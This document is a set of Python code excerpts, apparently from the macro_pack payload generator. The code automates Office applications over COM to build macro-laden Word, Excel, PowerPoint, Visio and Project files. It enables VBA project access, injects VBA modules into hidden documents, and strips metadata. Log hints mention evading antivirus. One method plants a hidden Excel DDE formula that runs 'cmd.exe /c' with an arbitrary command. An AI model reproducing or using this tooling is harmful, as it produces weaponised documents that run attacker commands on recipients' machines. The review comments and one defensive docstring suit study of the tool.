예제 #1
 def generate(self):
     """Create an MS Project file through COM automation and load the generated VBA files into it.

     Starts ``MSProject.Application`` hidden, adds a new project, puts the
     main VBA file into the ``ThisProject`` component and every other file
     into a new module named after the file, then saves the project to
     ``self.outputFilePath``. Any exception is logged and followed by an
     attempt to close MS Project; nothing is re-raised and nothing is returned.
     """
     
     logging.info(" [+] Generating MSProject project...")
     try:
     
         # NOTE(review): enableVbom() is not shown here; presumably it switches on Office's
         # "Trust access to the VBA project object model" setting, which the VBProject calls
         # below depend on -- confirm. It is undone by disableVbom() on the success path only.
         self.enableVbom()
 
         logging.info("   [-] Open MSProject project...")
         # Start MS Project through its COM automation object (win32com)
         MSProject = win32com.client.Dispatch("MSProject.Application")
         project = MSProject.Projects.Add()
         # Keep the application window hidden while the project is built
         MSProject.Visible = False
         
         self.resetVBAEntryPoint()
         logging.info("   [-] Inject VBA...")
         # Load every generated VBA source file into the project
         for vbaFile in self.getVBAFiles():
             if vbaFile == self.getMainVBAFile():       
                 with open (vbaFile, "r") as f:
                     # The main file goes into the existing ThisProject component
                     ProjectModule = project.VBProject.VBComponents("ThisProject")
                     macro=f.read()
                     ProjectModule.CodeModule.AddFromString(macro)
             else: # inject other vba files as modules
                 with open (vbaFile, "r") as f:
                     macro=f.read()
                     # Component type 1 is a standard module; it is named after the file's base name
                     ProjectModule = project.VBProject.VBComponents.Add(1)
                     ProjectModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
                     ProjectModule.CodeModule.AddFromString(macro)
 
             
         # Metadata removal is disabled for this format (the two lines below are commented out)
         #logging.info("   [-] Remove hidden data and personal info...")
         #project.RemoveFileProperties = 1 
         
         logging.info("   [-] Save MSProject project...")
         pjMPP = 0 # The file was saved with the current version of Microsoft Office MSProject.        
         project.SaveAs(self.outputFilePath,Format = pjMPP)
         
         # Close the saved project and shut the application down
         MSProject.FileClose ()
         MSProject.Quit()
         # Drop the COM reference
         del MSProject
         self.disableVbom()
 
         logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
         # NOTE(review): getRunningApp() is called unqualified here while the process helpers
         # below are reached through `utils.` -- this only resolves if the name is imported
         # directly into the module; confirm.
         logging.info("   [-] Test with : \n%s --run %s\n" % (getRunningApp(),self.outputFilePath))
     except Exception:
         # NOTE(review): this branch never calls self.disableVbom(), so whatever enableVbom()
         # changed stays in effect after a failure. The Dispatch call below can itself raise,
         # in which case the process kill is skipped and the error leaves generate().
         logging.exception(" [!] Exception caught!")
         logging.error(" [!] Hints: Check if MS Project is really closed and Antivirus did not catch the files")
         logging.error(" [!] Attempt to force close MS Project applications...")
         objProject = win32com.client.Dispatch("MSProject.Application")
         objProject.Application.Quit()
         # If Application.Quit() was not enough, kill the process by image name
         # (presumably every winproj.exe instance, including unrelated ones -- confirm in utils)
         if utils.checkIfProcessRunning("winproj.exe"):
             utils.forceProcessKill("winproj.exe")
         del objProject
예제 #2
 def generate(self):
     """Create a PowerPoint presentation through COM automation and load the generated VBA files into it.

     Starts ``PowerPoint.Application``, adds a windowless presentation, adds
     one module per VBA file (named after the file), strips document
     information, saves to ``self.outputFilePath`` and then calls
     ``self._injectCustomUi()``. Any exception is logged and followed by an
     attempt to close PowerPoint; nothing is re-raised and nothing is returned.
     """
     
     logging.info(" [+] Generating MS PowerPoint document...")
     try:
         # NOTE(review): enableVbom() is not shown here; presumably it switches on Office's
         # "Trust access to the VBA project object model" setting, which the VBProject calls
         # below depend on -- confirm. It is undone by disableVbom() on the success path only.
         self.enableVbom()
         
         # Start PowerPoint through its COM automation object (win32com)
         ppt = win32com.client.Dispatch("PowerPoint.Application")
 
         logging.info("   [-] Open presentation...")
         # WithWindow=False creates the presentation without a visible window
         presentation = ppt.Presentations.Add(WithWindow = False)
         
         self.resetVBAEntryPoint()
         logging.info("   [-] Inject VBA...")
         # Load every generated VBA source file into the presentation
         for vbaFile in self.getVBAFiles():
             # Every file becomes its own module; unlike the other generators there is
             # no special component for the main file
             with open (vbaFile, "r") as f:
                 macro=f.read()
                 # Component type 1 is a standard module; it is named after the file's base name
                 pptModule = presentation.VBProject.VBComponents.Add(1)
                 pptModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
                 pptModule.CodeModule.AddFromString(macro)
         
         # Strip document information; 99 is passed as the "remove all" selector
         logging.info("   [-] Remove hidden data and personal info...")
         ppRDIAll=99
         presentation.RemoveDocumentInformation(ppRDIAll)
         
         logging.info("   [-] Save presentation...")
         # File-format codes for the macro-enabled presentation (.pptm) and template (.potm)
         pptXMLFileFormatMap = {".pptm": 25, ".potm": 27}
         # NOTE(review): the lookup uses the last five characters of the path, so any other
         # extension raises KeyError (handled by the except below); when outputFileType is
         # not MSTypes.PPT nothing is saved at all.
         if MSTypes.PPT == self.outputFileType:
             presentation.SaveAs(self.outputFilePath, FileFormat=pptXMLFileFormatMap[self.outputFilePath[-5:]])
         # Close the presentation and shut the application down
         ppt.Presentations(1).Close()
         ppt.Quit()
         # Drop the COM reference
         del ppt
         
         self.disableVbom()
         
         # Runs after PowerPoint has been closed; _injectCustomUi() is not shown here
         logging.info("   [-] Inject Custom UI...")
         self._injectCustomUi()
            
         logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
         logging.info("   [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(),self.outputFilePath))
     
     except Exception:
         # NOTE(review): this branch never calls self.disableVbom(), so a failure before the
         # success-path call leaves whatever enableVbom() changed in effect. The Dispatch
         # call below can itself raise, in which case the process kill is skipped.
         logging.exception(" [!] Exception caught!")
         logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
         logging.error(" [!] Attempt to force close MS Powerpoint application...")
         ppt = win32com.client.Dispatch("PowerPoint.Application")
         ppt.Quit()
         # If Quit() was not enough, kill the process by image name
         # (presumably every powerpnt.exe instance, including unrelated ones -- confirm in utils)
         if utils.checkIfProcessRunning("powerpnt.exe"):
             utils.forceProcessKill("powerpnt.exe")
         del ppt
예제 #3
    def generate(self):
        """Create a Visio document through COM automation and load the generated VBA files into it.

        Starts ``Visio.InvisibleApp``, adds an empty document, saves it to
        ``self.outputFilePath`` first, then puts the main VBA file into the
        ``ThisDocument`` component and every other file into a new module
        named after the file, and saves again. Any exception is logged and
        followed by an attempt to close Visio; nothing is re-raised and
        nothing is returned.
        """

        logging.info(" [+] Generating MS Visio document...")
        try:
            # NOTE(review): enableVbom() is not shown here; presumably it switches on Office's
            # "Trust access to the VBA project object model" setting, which the VBProject calls
            # below depend on -- confirm. It is undone by disableVbom() on the success path only.
            self.enableVbom()
    
            logging.info("   [-] Open document...")
            # Start Visio through its COM automation object (win32com);
            # the InvisibleApp ProgID is used so no window is shown
            visio = win32com.client.Dispatch("Visio.InvisibleApp")
    
            document = visio.Documents.Add("")
    
            # The document is written to its final path before any VBA is added
            logging.info("   [-] Save document format...")        
            document.SaveAs(self.outputFilePath)
                
            self.resetVBAEntryPoint()
            logging.info("   [-] Inject VBA...")
            # Load every generated VBA source file into the document
            for vbaFile in self.getVBAFiles():
                if vbaFile == self.getMainVBAFile():       
                    with open (vbaFile, "r") as f:
                        macro=f.read()
                        # The main file goes into the existing ThisDocument component
                        visioModule = document.VBProject.VBComponents("ThisDocument")
                        visioModule.CodeModule.AddFromString(macro)
                else: # inject other vba files as modules
                    with open (vbaFile, "r") as f:
                        macro=f.read()
                        # Component type 1 is a standard module; it is named after the file's base name
                        visioModule = document.VBProject.VBComponents.Add(1)
                        visioModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
                        visioModule.CodeModule.AddFromString(macro)
            
            # Ask Visio to strip personal information when the document is saved
            logging.info("   [-] Remove hidden data and personal info...")
            document.RemovePersonalInformation = True
            
            # Save again with the VBA in place, then close and quit
            document.Save()
            document.Close()
            visio.Application.Quit()
            # Drop the COM reference
            del visio
            self.disableVbom()
    
            logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
            logging.info("   [-] Test with : \n%s --run %s\n" % (utils.getRunningApp(),self.outputFilePath))
        
        except Exception:
            # NOTE(review): this branch never calls self.disableVbom(), so whatever enableVbom()
            # changed stays in effect after a failure. The Dispatch call below can itself
            # raise, in which case the process kill is skipped.
            logging.exception(" [!] Exception caught!")
            logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
            logging.error(" [!] Attempt to force close MS Visio applications...")
            visio = win32com.client.Dispatch("Visio.InvisibleApp")
            visio.Application.Quit()
            # If Application.Quit() was not enough, kill the process by image name
            # (presumably every visio.exe instance, including unrelated ones -- confirm in utils)
            if utils.checkIfProcessRunning("visio.exe"):
                utils.forceProcessKill("visio.exe")
예제 #4
    def run(self):
        """Open the workbook at ``self.outputFilePath`` and write a DDE formula into cell (1, 26).

        The command line is read through ``self.fillInputParams`` under the
        key ``"Cmd_Line"`` and placed in a formula that names ``cmd.exe`` as
        the DDE target. Document information is then stripped and the
        workbook is saved in place. Any exception is logged and followed by
        an attempt to close Excel; nothing is re-raised and nothing is
        returned.

        Defensive note: a cell formula of this ``=<app>|'<program> <args>'!<item>``
        shape is the artefact that content scanners look for in workbooks, and
        Office security settings can block or prompt on the launch it requests.
        """
        logging.info(" [+] Generating MS Excel with DDE document...")
        try:
            # Get command line
            # NOTE(review): fillInputParams() is not shown; presumably it fills in "Cmd_Line".
            # If the value stays None, command.rstrip() below raises and the except branch runs.
            paramDict = OrderedDict([("Cmd_Line", None)])
            self.fillInputParams(paramDict)
            command = paramDict["Cmd_Line"]

            logging.info("   [-] Open document...")
            # Start Excel through its COM automation object (win32com)
            excel = win32com.client.Dispatch("Excel.Application")
            # Hiding the window is disabled here (the assignment below is commented out)
            #excel.Visible = False
            workbook = excel.Workbooks.Open(self.outputFilePath)

            logging.info("   [-] Inject DDE field (Answer 'No' to popup)...")

            # The command is inserted as-is, with only trailing whitespace removed
            ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip(
            )
            # Row 1, column 26 of the active sheet receives the formula and is flagged FormulaHidden
            excel.Cells(1, 26).Formula = ddeCmd
            excel.Cells(1, 26).FormulaHidden = True

            # Strip document information; 99 is passed as the "remove all" selector
            logging.info("   [-] Remove hidden data and personal info...")
            xlRDIAll = 99
            workbook.RemoveDocumentInformation(xlRDIAll)
            logging.info("   [-] Save Document...")
            # Suppress Excel's dialogs, then close the first workbook with its changes saved
            excel.DisplayAlerts = False
            excel.Workbooks(1).Close(SaveChanges=1)
            excel.Application.Quit()

            # Drop the COM reference
            del excel
            logging.info("   [-] Generated %s file path: %s" %
                         (self.outputFileType, self.outputFilePath))

        except Exception:
            # NOTE(review): the Dispatch call below can itself raise, in which case the
            # process kill is skipped and the error leaves run().
            logging.exception(" [!] Exception caught!")
            logging.error(
                " [!] Hints: Check if MS office is really closed and Antivirus did not catch the files"
            )
            logging.error(
                " [!] Attempt to force close MS Excel applications...")
            objExcel = win32com.client.Dispatch("Excel.Application")
            objExcel.Application.Quit()
            del objExcel
            # If Application.Quit() was not enough, kill the process by image name
            # (presumably every Excel.exe instance, including unrelated ones -- confirm in utils)
            if utils.checkIfProcessRunning("Excel.exe"):
                utils.forceProcessKill("Excel.exe")
예제 #5
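 def check(self):
     """Report whether PowerPoint can be automated on this machine.

     If a ``powerpnt.exe`` process is running, the user is asked whether it
     may be killed; declining ends the check. A throwaway
     ``PowerPoint.Application`` COM object is then created and quit to show
     that the application is installed and reachable.

     Returns:
         True when the COM object could be created and quit, False when the
         user declined the kill or the COM object was not usable.
     """
     logging.info("   [-] Check feasibility...")
     if utils.checkIfProcessRunning("powerpnt.exe"):
         logging.error("   [!] Cannot generate PowerPoint payload if PowerPoint is already running.")
         if not utils.yesOrNo(" Do you want macro_pack to kill PowerPoint process? "):
             return False
         # Kills by image name; any unsaved work in that process is lost
         utils.forceProcessKill("powerpnt.exe")
     try:
         ppt = win32com.client.Dispatch("PowerPoint.Application")
         ppt.Quit()
         del ppt
     except Exception:
         # Exception instead of a bare except, so Ctrl-C and SystemExit are not
         # swallowed and misreported as "software not installed"
         logging.error("   [!] Cannot access PowerPoint.Application object. Is software installed on machine? Abort.")
         return False
     return True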
예제 #6
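 def check(self):
     """Report whether MS Project can be automated on this machine.

     If a ``winproj.exe`` process is running, it is killed when
     ``self.mpSession.forceYes`` is set or the user agrees; otherwise the
     check ends. A throwaway ``MSProject.Application`` COM object is then
     created and quit to show that the application is installed and reachable.

     Returns:
         True when the COM object could be created and quit, False when the
         kill was declined or the COM object was not usable.
     """
     logging.info("   [-] Check feasibility...")

     if utils.checkIfProcessRunning("winproj.exe"):
         logging.error("   [!] Cannot generate MS Project payload if Project is already running.")
         # forceYes short-circuits the prompt, so no question is asked when it is set
         if not (self.mpSession.forceYes or utils.yesOrNo(" Do you want macro_pack to kill Ms Project process? ")):
             return False
         # Kills by image name; any unsaved work in that process is lost
         utils.forceProcessKill("winproj.exe")
     try:
         objProject = win32com.client.Dispatch("MSProject.Application")
         objProject.Application.Quit()
         del objProject
     except Exception:
         # Exception instead of a bare except, so Ctrl-C and SystemExit are not
         # swallowed and misreported as "software not installed"
         logging.error("   [!] Cannot access MSProject.Application object. Is software installed on machine? Abort.")
         return False
     return True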
예제 #7
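 def check(self):
     """Report whether Visio can be automated on this machine.

     If a ``visio.exe`` process is running, the user is asked whether it may
     be killed; declining ends the check. A throwaway ``Visio.InvisibleApp``
     COM object is then created and quit to show that the application is
     installed and reachable.

     Returns:
         True when the COM object could be created and quit, False when the
         user declined the kill or the COM object was not usable.
     """
     logging.info("   [-] Check feasibility...")
     if utils.checkIfProcessRunning("visio.exe"):
         logging.error("   [!] Cannot generate Visio payload if Visio is already running.")
         if not utils.yesOrNo(" Do you want macro_pack to kill Visio process? "):
             return False
         # Kills by image name; any unsaved work in that process is lost
         utils.forceProcessKill("visio.exe")
     # Probe the COM object (the old "Check nb of source file" comment did not match this code)
     try:
         objVisio = win32com.client.Dispatch("Visio.InvisibleApp")
         objVisio.Application.Quit()
         del objVisio
     except Exception:
         # Exception instead of a bare except, so Ctrl-C and SystemExit are not
         # swallowed and misreported as "software not installed"
         logging.error("   [!] Cannot access Visio.InvisibleApp object. Is software installed on machine? Abort.")
         return False
     return True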
예제 #8
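 def check(self):
     """Report whether Word can be automated on this machine.

     If a ``winword.exe`` process is running, the user is asked whether it
     may be killed; declining ends the check. A throwaway
     ``Word.Application`` COM object is then created and quit to show that
     the application is installed and reachable.

     Returns:
         True when the COM object could be created and quit, False when the
         user declined the kill or the COM object was not usable.
     """
     logging.info("   [-] Check feasibility...")
     if utils.checkIfProcessRunning("winword.exe"):
         logging.error(
             "   [!] Cannot generate Word payload if Word is already running."
         )
         if not utils.yesOrNo(" Do you want macro_pack to kill Word process? "):
             return False
         # Kills by image name; any unsaved work in that process is lost
         utils.forceProcessKill("winword.exe")
     try:
         objWord = win32com.client.Dispatch("Word.Application")
         objWord.Application.Quit()
         del objWord
     except Exception:
         # Exception instead of a bare except, so Ctrl-C and SystemExit are not
         # swallowed and misreported as "software not installed"
         logging.error(
             "   [!] Cannot access Word.Application object. Is software installed on machine? Abort."
         )
         return False
     return True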
예제 #9
    def generate(self):
        """Create an Excel workbook through COM automation and load the generated VBA files into it.

        Starts ``Excel.Application`` hidden, adds a new workbook, puts the
        main VBA file into the ``ThisWorkbook`` component and every other
        file into a new module named after the file, strips document
        information and saves to ``self.outputFilePath``. When
        ``self.mpSession.ddeMode`` is set, ``self.insertDDE()`` runs
        afterwards. Any exception is logged and followed by an attempt to
        close Excel; nothing is re-raised and nothing is returned.
        """

        logging.info(" [+] Generating MS Excel document...")
        try:
            # NOTE(review): enableVbom() is not shown here; presumably it switches on Office's
            # "Trust access to the VBA project object model" setting, which the VBProject calls
            # below depend on -- confirm. It is undone by disableVbom() on the success path only.
            self.enableVbom()

            # Start Excel through its COM automation object (win32com)
            excel = win32com.client.Dispatch("Excel.Application")
            # Keep the application window hidden while the workbook is built
            excel.Visible = False
            # A new, empty workbook is always created; no existing file is opened here
            logging.info("   [-] Open workbook...")
            workbook = excel.Workbooks.Add()

            self.resetVBAEntryPoint()
            logging.info("   [-] Inject VBA...")
            # Load every generated VBA source file into the workbook
            for vbaFile in self.getVBAFiles():
                logging.debug("     [,] Loading %s " % vbaFile)
                if vbaFile == self.getMainVBAFile():
                    with open(vbaFile, "r") as f:
                        macro = f.read()
                        # The main file goes into the existing ThisWorkbook component
                        excelModule = workbook.VBProject.VBComponents(
                            "ThisWorkbook")
                        excelModule.CodeModule.AddFromString(macro)
                else:  # inject other vba files as modules
                    with open(vbaFile, "r") as f:
                        macro = f.read()
                        # Component type 1 is a standard module; it is named after the file's base name
                        excelModule = workbook.VBProject.VBComponents.Add(1)

                        excelModule.Name = os.path.splitext(
                            os.path.basename(vbaFile))[0]
                        excelModule.CodeModule.AddFromString(macro)

            # Suppress Excel's dialogs for the remaining steps
            excel.DisplayAlerts = False
            # Strip document information; 99 is passed as the "remove all" selector
            logging.info("   [-] Remove hidden data and personal info...")
            xlRDIAll = 99
            workbook.RemoveDocumentInformation(xlRDIAll)

            logging.info("   [-] Save workbook...")
            # File-format codes: 56 for the Excel 97-2003 format, the map for the Open XML extensions
            xlExcel8 = 56
            xlXMLFileFormatMap = {".xlsx": 51, ".xlsm": 52, ".xltm": 53}

            # NOTE(review): the map lookup uses the last five characters of the path, so any
            # other extension raises KeyError (handled by the except below); when
            # outputFileType matches neither branch, SaveAs is never called.
            if self.outputFileType == MSTypes.XL97:
                workbook.SaveAs(self.outputFilePath, FileFormat=xlExcel8)
            elif MSTypes.XL == self.outputFileType:
                workbook.SaveAs(
                    self.outputFilePath,
                    FileFormat=xlXMLFileFormatMap[self.outputFilePath[-5:]])

            # Close the first workbook with its changes saved, then quit
            excel.Workbooks(1).Close(SaveChanges=1)
            excel.Application.Quit()
            # Drop the COM reference
            del excel

            self.disableVbom()

            # insertDDE() is not shown here; it runs only when the session's ddeMode flag is set
            if self.mpSession.ddeMode:  # DDE Attack mode
                self.insertDDE()

            logging.info("   [-] Generated %s file path: %s" %
                         (self.outputFileType, self.outputFilePath))
            logging.info("   [-] Test with : \n%s --run %s\n" %
                         (utils.getRunningApp(), self.outputFilePath))

        except Exception:
            # NOTE(review): this branch never calls self.disableVbom(), so a failure before the
            # success-path call leaves whatever enableVbom() changed in effect. The Dispatch
            # call below can itself raise, in which case the process kill is skipped.
            logging.exception(" [!] Exception caught!")
            logging.error(
                " [!] Hints: Check if MS office is really closed and Antivirus did not catch the files"
            )
            logging.error(
                " [!] Attempt to force close MS Excel applications...")
            objExcel = win32com.client.Dispatch("Excel.Application")
            objExcel.Application.Quit()
            # If Application.Quit() was not enough, kill the process by image name
            # (presumably every Excel.exe instance, including unrelated ones -- confirm in utils)
            if utils.checkIfProcessRunning("Excel.exe"):
                utils.forceProcessKill("Excel.exe")
            del objExcel
예제 #10
    def generate(self):
        """Create a Word document through COM automation and load the generated VBA files into it.

        Starts ``Word.Application`` hidden, adds a new document and saves it
        to ``self.outputFilePath`` first, then puts the main VBA file into
        the ``ThisDocument`` component and every other file into a new module
        named after the file, strips document information and saves again.
        When ``self.mpSession.ddeMode`` is set, ``self.insertDDE()`` runs
        afterwards. Any exception is logged and followed by an attempt to
        close Word; nothing is re-raised and nothing is returned.
        """

        logging.info(" [+] Generating MS Word document...")
        try:
            # NOTE(review): enableVbom() is not shown here; presumably it switches on Office's
            # "Trust access to the VBA project object model" setting, which the VBProject calls
            # below depend on -- confirm. It is undone by disableVbom() on the success path only.
            self.enableVbom()

            logging.info("   [-] Open document...")
            # Start Word through its COM automation object (win32com)
            word = win32com.client.Dispatch("Word.Application")
            # Keep the Word window hidden while the document is built
            word.Visible = False
            document = word.Documents.Add()

            logging.info("   [-] Save document format...")
            # File-format codes: 0 for the Word 97-2003 format, the map for the Open XML extensions
            wdFormatDocument = 0
            wdXMLFileFormatMap = {".docx": 12, ".docm": 13, ".dotm": 15}

            # NOTE(review): the map lookup uses the last five characters of the path, so any
            # other extension raises KeyError (handled by the except below); when
            # outputFileType matches neither branch, SaveAs is never called.
            if MSTypes.WD97 == self.outputFileType:
                document.SaveAs(self.outputFilePath,
                                FileFormat=wdFormatDocument)
            elif MSTypes.WD == self.outputFileType:
                document.SaveAs(
                    self.outputFilePath,
                    FileFormat=wdXMLFileFormatMap[self.outputFilePath[-5:]])

            self.resetVBAEntryPoint()
            logging.info("   [-] Inject VBA...")
            # Load every generated VBA source file into the document
            for vbaFile in self.getVBAFiles():
                logging.debug("     -> File %s" % vbaFile)
                if vbaFile == self.getMainVBAFile():
                    with open(vbaFile, "r") as f:
                        # The main file goes into the existing ThisDocument component
                        wordModule = document.VBProject.VBComponents(
                            "ThisDocument")
                        macro = f.read()
                        #logging.info(macro)
                        wordModule.CodeModule.AddFromString(macro)
                else:  # inject other vba files as modules
                    with open(vbaFile, "r") as f:
                        macro = f.read()
                        #logging.info(macro)
                        # Component type 1 is a standard module; it is named after the file's base name
                        wordModule = document.VBProject.VBComponents.Add(1)
                        wordModule.Name = os.path.splitext(
                            os.path.basename(vbaFile))[0]
                        wordModule.CodeModule.AddFromString(macro)
                        # After each extra module: pagination off, undo history cleared,
                        # repaginate, screen refreshed, document saved. The reason for this
                        # sequence is not visible here -- presumably a workaround; confirm.
                        document.Application.Options.Pagination = False
                        document.UndoClear()
                        document.Repaginate()
                        document.Application.ScreenUpdating = True
                        document.Application.ScreenRefresh()
                        #logging.info("   [-] Saving module %s..." %  wordModule.Name)
                        document.Save()

            #word.DisplayAlerts=False
            # Strip document information; 99 is passed as the "remove all" selector
            logging.info("   [-] Remove hidden data and personal info...")
            wdRDIAll = 99
            document.RemoveDocumentInformation(wdRDIAll)

            # Save with the VBA in place, then close and quit
            document.Save()
            document.Close()
            word.Application.Quit()
            # Drop the COM reference
            del word
            self.disableVbom()

            # insertDDE() is not shown here; it runs only when the session's ddeMode flag is set
            if self.mpSession.ddeMode:  # DDE Attack mode
                self.insertDDE()

            logging.info("   [-] Generated %s file path: %s" %
                         (self.outputFileType, self.outputFilePath))
            logging.info("   [-] Test with : \n%s --run %s\n" %
                         (utils.getRunningApp(), self.outputFilePath))
        except Exception:
            # NOTE(review): this branch never calls self.disableVbom(), so a failure before the
            # success-path call leaves whatever enableVbom() changed in effect. The Dispatch
            # call below can itself raise, in which case the process kill is skipped.
            logging.exception(" [!] Exception caught!")
            logging.error(
                " [!] Hints: Check if MS office is really closed and Antivirus did not catch the files"
            )
            logging.error(" [!] Attempt to force close MS Word...")
            objWord = win32com.client.Dispatch("Word.Application")
            objWord.Application.Quit()
            # If Application.Quit() was not enough, kill the process by image name
            # (presumably every winword.exe instance, including unrelated ones -- confirm in utils)
            if utils.checkIfProcessRunning("winword.exe"):
                utils.forceProcessKill("winword.exe")
            del objWord